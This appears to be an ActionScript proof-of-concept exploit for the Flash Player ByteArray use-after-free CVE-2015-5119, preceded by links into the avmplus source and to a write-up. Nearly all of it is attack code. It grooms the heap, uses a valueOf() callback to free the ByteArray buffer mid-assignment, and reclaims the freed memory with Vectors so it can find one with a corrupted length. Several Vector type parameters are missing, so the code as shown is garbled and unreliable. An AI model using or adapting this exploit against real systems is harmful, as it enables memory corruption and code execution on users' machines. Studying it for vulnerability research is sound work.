https://github.com/adobe/avmplus/blob/858d034a3bd3a54d9b70909386435cf4aec81d21/core/ScriptObject.cpp#L589
https://github.com/adobe/avmplus/blob/858d034a3bd3a54d9b70909386435cf4aec81d21/core/ScriptObject.h#L109
https://github.com/adobe/avmplus/blob/master/core/atom.h#L76
https://github.com/adobe/avmplus/blob/master/core/AvmCore.cpp#L2157
https://github.com/adobe/avmplus/blob/master/core/ByteArrayGlue.cpp#L1975
https://github.com/adobe/avmplus/blob/master/core/AvmCore.cpp#L4978
http://reversing.fr/adobe-flash-player-bytearray-use-after-free-cve-2015-5119/
package
{
import flash.display.Sprite;
import flash.events.Event;
import flash.utils.ByteArray;
import flash.media.Sound;
import flash.external.ExternalInterface;
public class Main extends Sprite
{
//private var data:uint = 0xdeaddead;
private var va:Array;
private var ba:ByteArray;// = new ByteArray();
private var o:*;
private var uv:Vector.
;
private var corrupted:Vector.;
//private var bp:Sound = new Sound();
public function Main(){
var alen:int = 90;
var a = new Array(alen);
o = new Object();
o.valueOf = function(){
trace("******** Object.valueOf() Start ********");
va = new Array(5);
ba.length = 0x1100;
for (var i:int; i < va.length; i++)
va[i] = new Vector.(0x3f0);
trace("******** Object.valueOf() Finished ********");
return 0x40;
}
trace("******** Start a[n] allocating ********");
for (var i:int; i < alen; i += 3){
a[i] = new Object();
a[i + 1] = new ByteArray();
a[i + 1].length = 0xfa0;
a[i + 2] = new Object();
}
trace("******** a[n] allocating finished ********");
trace("******** Start Uaf Triggering ********");
for (i = alen - 5; i >= 0; i -= 3){
ba = a[i];
trace("******** Call o.valueOf() ********");
ba[3] = o;
if (ba[3] != 0) trace("******** UAF TRIGGERING FAILED ********");
for (var j:int = 0; j < va.length; j++){
if (va[j].length != 0x3f0){
corrupted = va[j]
}
}
if (corrupted != null){
trace("******** corrupted.length = 0x" + corrupted.length.toString(16) + " ********");
}
}
trace("******** Uaf Triggering Finished ********");
}
}
}